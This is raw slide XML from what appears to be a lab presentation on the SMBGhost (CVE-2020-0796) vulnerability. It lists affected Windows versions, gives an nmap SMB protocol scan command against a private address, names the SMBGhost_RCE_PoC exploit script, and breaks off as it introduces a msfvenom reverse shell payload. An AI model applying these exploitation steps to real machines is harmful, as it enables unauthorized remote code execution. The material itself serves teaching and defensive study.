        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67E0CD91-313F-971D-1AC9-102BF6BD1C3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6775704" y="5330952"/>
            <a:ext cx="3666744" cy="32918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85D4A34-877C-8DCC-E243-AE6E36A8A0B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562357" y="4245864"/>
            <a:ext cx="3666744" cy="43586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3859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6A6A-7B9F-43B4-17A0-B53F455162BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365761" y="714375"/>
            <a:ext cx="3941374" cy="5076826"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>SMB GHOST vulnerability Affected system</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="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2248520-5DCB-42DC-8676-C66D6D79F7CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973046" y="714375"/>
            <a:ext cx="6253751" cy="5076825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows 10 Versions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Version 1903 (Builds 18362.0 - 18362.720)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Version 1909 (Builds 18363.0 - 18363.720)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Server Versions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1903</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1909</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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58421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E260-7EED-7BDB-AF7C-B43CF2F237CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256032" y="609600"/>
            <a:ext cx="3796657" cy="1905000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng" dirty="0"/>
              <a:t>Conducting further reconnaissance on the machine vulnerable to the SMB Ghost exploit.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78DF9E50-917D-C3B2-CD79-72C8FA1AD0AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="256032" y="2666999"/>
            <a:ext cx="3796657" cy="3216276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>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tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr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marL="0" marR="0" lvl="0" indent="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" cap="small" normalizeH="0" baseline="0" dirty="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Run a Nmap Script SMB –protocols scan on the target to know if the vulnerable SMB versions are running.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" cap="small" normalizeH="0" baseline="0" dirty="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The command used: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" cap="small" normalizeH="0" baseline="0" dirty="0" err="1">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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" cap="small" normalizeH="0" baseline="0" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" cap="small" normalizeH="0" baseline="0" dirty="0" err="1">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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" cap="small" normalizeH="0" baseline="0" dirty="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 --script </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" cap="small" normalizeH="0" baseline="0" dirty="0" err="1">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smb</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" cap="small" normalizeH="0" baseline="0" dirty="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-protocols -p445 192.168.164.153</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="342900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" cap="small" normalizeH="0" baseline="0" dirty="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pic>
        <p:nvPicPr>
          <p:cNvPr id="2049" name="Picture 1" descr="A computer screen shot of a computer program&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2487CEFB-5E22-C81B-355B-DC2DCE36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5975" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4052689" y="609600"/>
            <a:ext cx="8072255" cy="6175410"/>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FD402F7-EC0A-C253-0023-C60FAA090658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1069848" y="4815522"/>
            <a:ext cx="117512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26065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9EF7-8A96-0D02-38BD-0FC84EC773B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974179" y="714375"/>
            <a:ext cx="3332955" cy="5076826"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Smb ghost</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="400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AAB49FB1-10FC-8C08-C7F7-35F2D0DA6AF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973046" y="714375"/>
            <a:ext cx="6253751" cy="5076825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMBGhost (CVE-2020-0796) is a remote code execution (RCE) vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Affects Microsoft Server Message Block 3.1.1 (SMBv3) protocol.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disclosed by Microsoft in March 2020.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploits improper handling of compressed data in SMBv3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Allows an attacker to execute arbitrary code on a target system remotely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2902509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7640DEC-97A2-496C-B454-5B165BB6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90BED00-9F54-3F59-D3F4-895A9E044FAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4123944" cy="2268122"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Exploitation On Windows 10 SMB Ghost vulnerable machine.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22070485-8CAC-6AB0-18AD-27DC2DC78580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4123944" y="3909"/>
            <a:ext cx="8068056" cy="1056795"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>For the Exploitation, We going to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SMBGhost_RCE_PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> exploitation Script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0175A588-E4B0-59A7-8E6D-1B851F1E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2268122"/>
            <a:ext cx="5586984" cy="4488882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF8FB4FD-AEF4-5629-51E1-AEA6DD9887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699566" y="2268122"/>
            <a:ext cx="6492434" cy="4488881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="A computer screen with green text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56ED805F-4D9E-3F48-DDF3-88663C5FE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123944" y="621793"/>
            <a:ext cx="8068056" cy="1646330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6456F275-965B-2A36-E9BF-CCA51738425D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4251960" y="1545336"/>
            <a:ext cx="1170432" cy="49377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8510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AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EFC5A07-CC69-21D3-E124-9CF96B05B9A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="884029"/>
            <a:ext cx="5776571" cy="4139837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A screen shot of a computer screen&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{983D862D-860F-8FF8-D057-3EDF17139D2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5776571" y="873572"/>
            <a:ext cx="6415429" cy="4150295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D6CF41F-2EFE-3F46-EB67-A5CF9E7DE18D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042416" y="5495544"/>
            <a:ext cx="10981944" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFFFDE4B-0CF5-A440-4BFE-2D8D11519017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="714058" y="5772543"/>
            <a:ext cx="10336605" cy="945883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6873613E-8173-A886-0822-AE6504D88FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="873572"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Now we need to create a reverse shell payload using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" kern="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" kern="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
